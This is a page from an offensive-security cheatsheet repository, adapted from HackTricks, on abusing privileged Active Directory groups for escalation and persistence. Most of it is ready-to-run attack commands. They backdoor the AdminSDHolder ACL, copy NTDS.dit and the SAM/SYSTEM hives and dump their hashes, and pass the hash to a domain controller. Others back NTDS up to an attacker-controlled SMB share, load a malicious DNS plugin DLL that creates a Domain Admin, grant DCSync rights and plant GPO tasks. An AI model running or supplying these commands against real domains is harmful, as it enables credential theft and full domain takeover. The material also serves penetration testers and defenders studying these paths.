daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

privileged-groups-and-token-privileges.md (20380B)


      1 ---
      2 title: "Privileged Groups"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Privileged Groups
     14 
     15 ## Well Known groups with administration privileges
     16 
     17 - **Administrators**
     18 - **Domain Admins**
     19 - **Enterprise Admins**
     20 
     21 ## Account Operators
     22 
     23 This group is empowered to create accounts and groups that are not administrators on the domain. Additionally, it enables local login to the Domain Controller (DC).
     24 
     25 To identify the members of this group, the following command is executed:
     26 
     27 ```bash
     28 Get-NetGroupMember -Identity "Account Operators" -Recurse
     29 ```
     30 
     31 Adding new users is permitted, as well as local login to the DC.<sup>[[1]](#references)</sup>
     32 
     33 ## AdminSDHolder group
     34 
     35 The **AdminSDHolder** group's Access Control List (ACL) is crucial as it sets permissions for all "protected groups" within Active Directory, including high-privilege groups. This mechanism ensures the security of these groups by preventing unauthorized modifications.
     36 
     37 An attacker could exploit this by modifying the **AdminSDHolder** group's ACL, granting full permissions to a standard user. This would effectively give that user full control over all protected groups. If this user's permissions are altered or removed, they would be automatically reinstated within an hour due to the system's design.<sup>[[14]](#references)</sup>
     38 
     39 Recent Windows Server documentation still treats several built-in operator groups as **protected** objects (`Account Operators`, `Backup Operators`, `Print Operators`, `Server Operators`, `Domain Admins`, `Enterprise Admins`, `Key Admins`, `Enterprise Key Admins`, etc.). The **SDProp** process runs on the **PDC Emulator** every 60 minutes by default, stamps `adminCount=1`, and disables inheritance on protected objects. This is useful both for persistence and for hunting stale privileged users that were removed from a protected group but still keep the non-inheriting ACL.<sup>[[12]](#references)</sup>
     40 
     41 Commands to review the members and modify permissions include:
     42 
     43 ```bash
     44 Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
     45 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
     46 Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
     47 ```
     48 
     49 ```powershell
     50 # Hunt users/groups that still have adminCount=1
     51 Get-ADObject -LDAPFilter '(adminCount=1)' -Properties adminCount,distinguishedName |
     52   Select-Object distinguishedName
     53 ```
     54 
     55 A script is available to expedite the restoration process: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
     56 
     57 For more details, visit [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence).<sup>[[14]](#references)</sup>
     58 
     59 ## AD Recycle Bin
     60 
     61 Membership in this group allows for the reading of deleted Active Directory objects, which can reveal sensitive information:
     62 
     63 ```bash
     64 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
     65 ```
     66 
     67 This is useful for **recovering previous privilege paths**. Deleted objects can still expose `lastKnownParent`, `memberOf`, `sIDHistory`, `adminCount`, old SPNs, or the DN of a deleted privileged group that can later be restored by another operator.
     68 
     69 ```powershell
     70 Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects `
     71   -Properties samAccountName,lastKnownParent,memberOf,sIDHistory,adminCount,servicePrincipalName |
     72   Select-Object samAccountName,lastKnownParent,adminCount,sIDHistory,servicePrincipalName
     73 ```
     74 
     75 ### Domain Controller Access
     76 
     77 Access to files on the DC is restricted unless the user is part of the `Server Operators` group, which changes the level of access.
     78 
     79 ### Privilege Escalation
     80 
     81 Using `PsService` or `sc` from Sysinternals, one can inspect and modify service permissions. The `Server Operators` group, for instance, has full control over certain services, allowing for the execution of arbitrary commands and privilege escalation:<sup>[[1]](#references)</sup>
     82 
     83 ```batch
     84 C:\> .\PsService.exe security AppReadiness
     85 ```
     86 
     87 This command reveals that `Server Operators` have full access, enabling the manipulation of services for elevated privileges.
     88 
     89 ## Backup Operators
     90 
     91 Membership in the `Backup Operators` group provides access to the `DC01` file system due to the `SeBackup` and `SeRestore` privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the `FILE_FLAG_BACKUP_SEMANTICS` flag. Utilizing specific scripts is necessary for this process.<sup>[[1]](#references)</sup>
     92 
     93 To list group members, execute:
     94 
     95 ```bash
     96 Get-NetGroupMember -Identity "Backup Operators" -Recurse
     97 ```
     98 
     99 ### Local Attack
    100 
    101 To leverage these privileges locally, the following steps are employed:
    102 
    103 1. Import necessary libraries:
    104 
    105 ```bash
    106 Import-Module .\SeBackupPrivilegeUtils.dll
    107 Import-Module .\SeBackupPrivilegeCmdLets.dll
    108 ```
    109 
    110 2. Enable and verify `SeBackupPrivilege`:
    111 
    112 ```bash
    113 Set-SeBackupPrivilege
    114 Get-SeBackupPrivilege
    115 ```
    116 
    117 3. Access and copy files from restricted directories, for instance:
    118 
    119 ```bash
    120 dir C:\Users\Administrator\
    121 Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
    122 ```
    123 
    124 ### AD Attack
    125 
    126 Direct access to the Domain Controller's file system allows for the theft of the `NTDS.dit` database, which contains all NTLM hashes for domain users and computers.
    127 
    128 #### Using diskshadow.exe
    129 
    130 1. Create a shadow copy of the `C` drive:
    131 
    132 ```batch
    133 diskshadow.exe
    134 set verbose on
    135 set metadata C:\Windows\Temp\meta.cab
    136 set context clientaccessible
    137 begin backup
    138 add volume C: alias cdrive
    139 create
    140 expose %cdrive% F:
    141 end backup
    142 exit
    143 ```
    144 
    145 2. Copy `NTDS.dit` from the shadow copy:
    146 
    147 ```batch
    148 Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
    149 ```
    150 
    151 Alternatively, use `robocopy` for file copying:
    152 
    153 ```batch
    154 robocopy /B F:\Windows\NTDS .\ntds ntds.dit
    155 ```
    156 
    157 3. Extract `SYSTEM` and `SAM` for hash retrieval:
    158 
    159 ```batch
    160 reg save HKLM\SYSTEM SYSTEM.SAV
    161 reg save HKLM\SAM SAM.SAV
    162 ```
    163 
    164 4. Retrieve all hashes from `NTDS.dit`:
    165 
    166 ```text
    167 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
    168 ```
    169 
    170 5. Post-extraction: Pass-the-Hash to DA<sup>[[11]](#references)</sup>
    171 
    172 ```bash
    173 # Use the recovered Administrator NT hash to authenticate without the cleartext password
    174 netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
    175 
    176 # Or execute via SMB using an exec method
    177 netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
    178 ```
    179 
    180 #### Using wbadmin.exe
    181 
    182 1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine.
    183 2. Use `wbadmin.exe` for system backup and `NTDS.dit` extraction:
    184    ```cmd
    185    net use X: \\<AttackIP>\sharename /user:smbuser password
    186    echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
    187    wbadmin get versions
    188    echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
    189    ```
    190 
    191 For a practical demonstration, see [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
    192 
    193 ## DnsAdmins
    194 
    195 Members of the **DnsAdmins** group can exploit their privileges to load an arbitrary DLL with SYSTEM privileges on a DNS server, often hosted on Domain Controllers. This capability allows for significant exploitation potential.
    196 
    197 To list members of the DnsAdmins group, use:
    198 
    199 ```bash
    200 Get-NetGroupMember -Identity "DnsAdmins" -Recurse
    201 ```
    202 
    203 ### Execute arbitrary DLL (CVE‑2021‑40469)
    204 
    205 > [!NOTE]
    206 > This vulnerability allows for the execution of arbitrary code with SYSTEM privileges in the DNS service (usually inside the DCs). This issue was fixed in 2021.
    207 
    208 Members can make the DNS server load an arbitrary DLL (either locally or from a remote share) using commands such as:
    209 
    210 ```bash
    211 dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
    212 dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
    213 An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
    214 
    215 # If dnscmd is not installed run from aprivileged PowerShell session:
    216 Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
    217 ```
    218 
    219 ```c
    220 // Modify DLL to add user
    221 DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
    222 {
    223     system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
    224     system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
    225 }
    226 ```
    227 
    228 ```bash
    229 // Generate DLL with msfvenom
    230 msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
    231 ```
    232 
    233 Restarting the DNS service (which may require additional permissions) is necessary for the DLL to be loaded:
    234 
    235 ```csharp
    236 sc.exe \\dc01 stop dns
    237 sc.exe \\dc01 start dns
    238 ```
    239 
    240 For more details on this attack vector, refer to ired.team.
    241 
    242 #### Mimilib.dll
    243 
    244 It's also feasible to use mimilib.dll for command execution, modifying it to execute specific commands or reverse shells. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) for more information.<sup>[[15]](#references)</sup>
    245 
    246 ### WPAD Record for MitM
    247 
    248 DnsAdmins can manipulate DNS records to perform Man-in-the-Middle (MitM) attacks by creating a WPAD record after disabling the global query block list. Tools like Responder or Inveigh can be used for spoofing and capturing network traffic.
    249 
    250 ### Event Log Readers
    251 Members can access event logs, potentially finding sensitive information such as plaintext passwords or command execution details:
    252 
    253 ```bash
    254 # Get members and search logs for sensitive information
    255 Get-NetGroupMember -Identity "Event Log Readers" -Recurse
    256 Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
    257 ```
    258 
    259 ## Exchange Windows Permissions
    260 
    261 This group can modify DACLs on the domain object, potentially granting DCSync privileges. Techniques for privilege escalation exploiting this group are detailed in Exchange-AD-Privesc GitHub repo.
    262 
    263 ```bash
    264 # List members
    265 Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
    266 ```
    267 
    268 If you can act as a member of this group, the classic abuse is to grant an attacker-controlled principal the replication rights needed for [DCSync](/hacktricks/windows-hardening/active-directory-methodology/dcsync):
    269 
    270 ```bash
    271 Add-DomainObjectAcl -TargetIdentity "DC=testlab,DC=local" -PrincipalIdentity attacker -Rights DCSync
    272 Get-ObjectAcl -DistinguishedName "DC=testlab,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match 'attacker'}
    273 ```
    274 
    275 Historically, **PrivExchange** chained mailbox access, coerced Exchange authentication, and LDAP relay to land on this same primitive. Even where that relay path is mitigated, direct membership in `Exchange Windows Permissions` or control of an Exchange server remains a high-value route to domain replication rights.
    276 
    277 ## Hyper-V Administrators
    278 
    279 Hyper-V Administrators have full access to Hyper-V, which can be exploited to gain control over virtualized Domain Controllers. This includes cloning live DCs and extracting NTLM hashes from the NTDS.dit file.
    280 
    281 ### Exploitation Example
    282 
    283 The practical abuse is usually **offline access to DC disks/checkpoints** rather than old host-level LPE tricks. With access to the Hyper-V host, an operator can checkpoint or export a virtualized Domain Controller, mount the VHDX, and extract `NTDS.dit`, `SYSTEM`, and other secrets without touching LSASS inside the guest:
    284 
    285 ```bash
    286 # Host-side enumeration
    287 Get-VM
    288 Get-VHD -VMId <vm-guid>
    289 
    290 # After exporting or checkpointing the DC, mount the disk read-only
    291 Mount-VHD -Path 'C:\HyperV\Virtual Hard Disks\DC01.vhdx' -ReadOnly
    292 ```
    293 
    294 From there, reuse the `Backup Operators` workflow to copy `Windows\NTDS\ntds.dit` and the registry hives offline. Related backup-file workflow:
    295 
    296 [Pentesting Veeam Backup And Replication](/hacktricks/network-services-pentesting/pentesting-veeam-backup-and-replication)
    297 
    298 ## Group Policy Creators Owners	
    299 
    300 This group allows members to create Group Policies in the domain. However, its members can't apply group policies to users or group or edit existing GPOs.
    301 
    302 The important nuance is that the **creator becomes owner of the new GPO** and usually gets enough rights to edit it afterwards. That means this group is interesting when you can either:
    303 
    304 - create a malicious GPO and convince an admin to link it to a target OU/domain
    305 - edit a GPO you created that is already linked somewhere useful
    306 - abuse another delegated right that lets you link GPOs, while this group gives you the edit side
    307 
    308 Practical abuse normally means adding an **Immediate Task**, **startup script**, **local admin membership**, or **user rights assignment** change through SYSVOL-backed policy files.<sup>[[3]](#references)[[4]](#references)[[13]](#references)[[16]](#references)</sup>
    309 
    310 ```bash
    311 # Example with SharpGPOAbuse: add an immediate task that executes as SYSTEM
    312 SharpGPOAbuse.exe --AddImmediateTask --TaskName "HT-Task" --Author TESTLAB\\Administrator --Command "cmd.exe" --Arguments "/c whoami > C:\\Windows\\Temp\\gpo.txt" --GPOName "Security Update"
    313 ```
    314 
    315 If editing the GPO manually through `SYSVOL`, remember the change is not enough by itself: `versionNumber`, `GPT.ini`, and sometimes `gPCMachineExtensionNames` must also be updated or clients will ignore the policy refresh.<sup>[[9]](#references)</sup>
    316 
    317 ## Organization Management
    318 
    319 In environments where **Microsoft Exchange** is deployed, a special group known as **Organization Management** holds significant capabilities. This group is privileged to **access the mailboxes of all domain users** and maintains **full control over the 'Microsoft Exchange Security Groups'** Organizational Unit (OU). This control includes the **`Exchange Windows Permissions`** group, which can be exploited for privilege escalation.
    320 
    321 ### Privilege Exploitation and Commands
    322 
    323 #### Print Operators
    324 
    325 Members of the **Print Operators** group are endowed with several privileges, including the **`SeLoadDriverPrivilege`**, which allows them to **log on locally to a Domain Controller**, shut it down, and manage printers. To exploit these privileges, especially if **`SeLoadDriverPrivilege`** is not visible under an unelevated context, bypassing User Account Control (UAC) is necessary.<sup>[[1]](#references)</sup>
    326 
    327 To list the members of this group, the following PowerShell command is used:
    328 
    329 ```bash
    330 Get-NetGroupMember -Identity "Print Operators" -Recurse
    331 ```
    332 
    333 On Domain Controllers this group is dangerous because the default Domain Controller Policy grants **`SeLoadDriverPrivilege`** to `Print Operators`. If you reach an elevated token for a member of this group, you can enable the privilege and load a signed-but-vulnerable driver to jump to kernel/SYSTEM.<sup>[[2]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[10]](#references)[[17]](#references)</sup> For token handling details, check [Access Tokens](/hacktricks/windows-hardening/windows-local-privilege-escalation/access-tokens).
    334 
    335 #### Remote Desktop Users
    336 
    337 This group's members are granted access to PCs via Remote Desktop Protocol (RDP). To enumerate these members, PowerShell commands are available:
    338 
    339 ```bash
    340 Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
    341 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
    342 ```
    343 
    344 Further insights into exploiting RDP can be found in dedicated pentesting resources.
    345 
    346 #### Remote Management Users
    347 
    348 Members can access PCs over **Windows Remote Management (WinRM)**. Enumeration of these members is achieved through:
    349 
    350 ```bash
    351 Get-NetGroupMember -Identity "Remote Management Users" -Recurse
    352 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
    353 ```
    354 
    355 For exploitation techniques related to **WinRM**, specific documentation should be consulted.
    356 
    357 #### Server Operators
    358 
    359 This group has permissions to perform various configurations on Domain Controllers, including backup and restore privileges, changing system time, and shutting down the system.<sup>[[1]](#references)</sup> To enumerate the members, the command provided is:
    360 
    361 ```bash
    362 Get-NetGroupMember -Identity "Server Operators" -Recurse
    363 ```
    364 
    365 On Domain Controllers, `Server Operators` commonly inherit enough rights to **reconfigure or start/stop services** and also receive `SeBackupPrivilege`/`SeRestorePrivilege` through the default DC policy. In practice, this makes them a bridge between **service-control abuse** and **NTDS extraction**:
    366 
    367 ```batch
    368 sc.exe \\dc01 query
    369 sc.exe \\dc01 qc <service>
    370 .\PsService.exe security <service>
    371 ```
    372 
    373 If a service ACL gives this group change/start rights, point the service at an arbitrary command, start it as `LocalSystem`, and then restore the original `binPath`. If service control is locked down, fall back to the `Backup Operators` techniques above to copy `NTDS.dit`.
    374 
    375 ## References
    376 
    377 - [1] [ired.team – Privileged Accounts and Token Privileges](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
    378 - [2] [Tarlogic – Abusing SeLoadDriverPrivilege for Privilege Escalation](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
    379 - [3] [harmj0y – Abusing GPO Permissions](https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/)
    380 - [4] [rastamouse – GPO Abuse, Part 1 (Internet Archive)](https://web.archive.org/web/20190416075109/https://rastamouse.me/2019/01/gpo-abuse-part-1/)
    381 - [5] [killswitch-GUI – HotLoad-Driver (ntloaddriver.cpp)](https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13)
    382 - [6] [tandasat – ExploitCapcom](https://github.com/tandasat/ExploitCapcom)
    383 - [7] [TarlogicSecurity – EoPLoadDriver (eoploaddriver.cpp)](https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp)
    384 - [8] [FuzzySecurity – Capcom-Rootkit (Capcom.sys)](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)
    385 - [9] [SpecterOps – A Red Teamer's Guide to GPOs and OUs](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
    386 - [10] [Microsoft Learn – ZwLoadDriver function](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwloaddriver)
    387 - [11] [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
    388 - [12] [Microsoft Learn – Appendix C: Protected Accounts and Groups in Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)
    389 - [13] [WithSecure Labs – SharpGPOAbuse](https://labs.withsecure.com/tools/sharpgpoabuse)
    390 - [14] [ired.team – How to Abuse and Backdoor AdminSDHolder to Obtain Domain Admin Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)
    391 - [15] [Lab of a Penetration Tester – Abusing DnsAdmins Privilege for Escalation in Active Directory](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)
    392 - [16] [BloodHound – GenericAll edge abuse information](https://bloodhound.specterops.io/resources/edges/generic-all)
    393 - [17] [Undocumented NT Internals – NtLoadDriver function (Internet Archive)](https://web.archive.org/web/20200313000124/http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)